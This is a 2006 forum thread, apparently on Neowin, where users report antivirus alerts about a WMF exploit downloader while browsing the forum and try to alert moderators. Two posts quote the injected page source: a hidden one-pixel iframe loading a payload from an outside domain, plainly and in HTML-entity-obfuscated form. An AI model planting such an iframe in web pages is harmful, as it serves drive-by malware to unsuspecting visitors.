Have the forums been hacked?


 Share

Recommended Posts

RaisinCain

Went to forums to post items for sale, clicked submit new post & BAM! NOD32 is going crazy saying that a trojan is trying to d/l through http. WTF?

Link to post
Share on other sites

84Mark

Any page that I browse to on the forums I get the following message from SAV:

Scan type: Auto-Protect Scan

Event: Threat Found!

Threat: Downloader

File: C:\Documents and Settings\Mark\Local Settings\Temporary Internet Files\Content.IE5\59Y2FM62\xpladv543[1].wmf

Location: C:\Documents and Settings\Mark\Local Settings\Temporary Internet Files\Content.IE5\59Y2FM62

Computer: JEDIMARK

User: Mark

Action taken: Clean failed : Quarantine failed : Access denied

Date found: 08 July 2006 09:55:36

(Please use small sizes for your images - Aaron)

I've scanned my computer and found nothing and it doesn't happen on any other websites?

Link to post
Share on other sites

jamend

I'm getting this too. A lot of unpatched people are going to get hacked (edit: the WMF exploit was patched post-SP2).

Link to post
Share on other sites

Ytterbium

Me too, NOD is going nuts

Link to post
Share on other sites

iascoot

When browsing neowin forums, every page i load says it in infected with Exploit.WMF trojan

SFLKSFNJ!

Connects to site zchxsikpgz.biz

only happens at this forum, no other locations

Link to post
Share on other sites

Mx

Same here too.

Link to post
Share on other sites

Rudy

nothing here....points to sig :D

Link to post
Share on other sites

iascoot

same here, big issues.. just posted about it, refreshed and seen this one

set your browser to higfh security temporary to stop it, just means most scripts wont work

Link to post
Share on other sites

84Mark

Place zchxsikpgz.biz in your restricted sites in IE.

Link to post
Share on other sites

Lowdar

I'm in Firefox now, but when I was viewing Neowin in Internet Explorer seven different trojans appeared. :p

Link to post
Share on other sites

Ranta

McAfee is going crazy, something is definately wrong with neowin.

Link to post
Share on other sites

chavo

No issues here. Running Konqueror 3.5.2 on Kubuntu 6.06.

Link to post
Share on other sites

accesser

Yeah I'm getting a pop-up like the ones you get to type text into a site

post-63776-1152349850_thumb.jpg

Link to post
Share on other sites

RaisinCain

Anyone notify a MOD?

Link to post
Share on other sites

iascoot

THIS IS IN THE SOURCE NEAR TOP

<iframe src="https://zchxsikpgz.biz/dl/adv543.php" width=1 height=1></iframe>

but is hidden behind other char's

directly under <body>

Edited by iascoot
Link to post
Share on other sites

RaisinCain

No issues here. Running Konqueror 3.5.2 on Kubuntu 6.06.

It won't affect Linux only Windows users using IE.

Link to post
Share on other sites

da13ro

Yes, if anyone has contact with a Mod or someone higher, i think the site needs to go into maintnance. Nice spot guys (im on FF)

Link to post
Share on other sites

iascoot

i PM'ed REDMARK twice but no response,

i posted another post about this in forum issues and it got deleted but this one stayed so SOMEONE knows...

Link to post
Share on other sites

84Mark

I was going to PM Redmak but then I noticed he was viewing the topic already so I'm sure it will be sorted soon...

Link to post
Share on other sites

Rudy

It won't affect Linux only Windows users using IE.

he prolly just was being a smartass like i was in my post

Link to post
Share on other sites

RaisinCain

Check this out.

post-11110-1152350187_thumb.jpg

Link to post
Share on other sites

Simon-

&lt;iframe src=" 104; 116; 116; 112; 58; 47; 47; 122; 99; 104; 120; 115; 105; 107; 112; 103; 122; 46; 98; 105; 122; 47; 100; 108; 47; 97; 100; 118; 53; 52; 51; 46; 112; 104; 112;" width=1 height=1&gt;&lt;/iframe&gt;

When the HTML entities are decoded (" ;"), it is http://zchxsikpgz.biz/dl/adv543.php

Didn't affect Firefox, had to fire up IE7 Beta 3 to see it, and NOD32 stopped it.

Edited by Quick Reply
Link to post
Share on other sites

John

Once that IFRAME is removed, everything should be fine. But how was the forum hacked in the first place???

Link to post
Share on other sites

Redmak

Can anyone post a selection of the source because I don't see it

Link to post
Share on other sites

This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    No registered users viewing this page.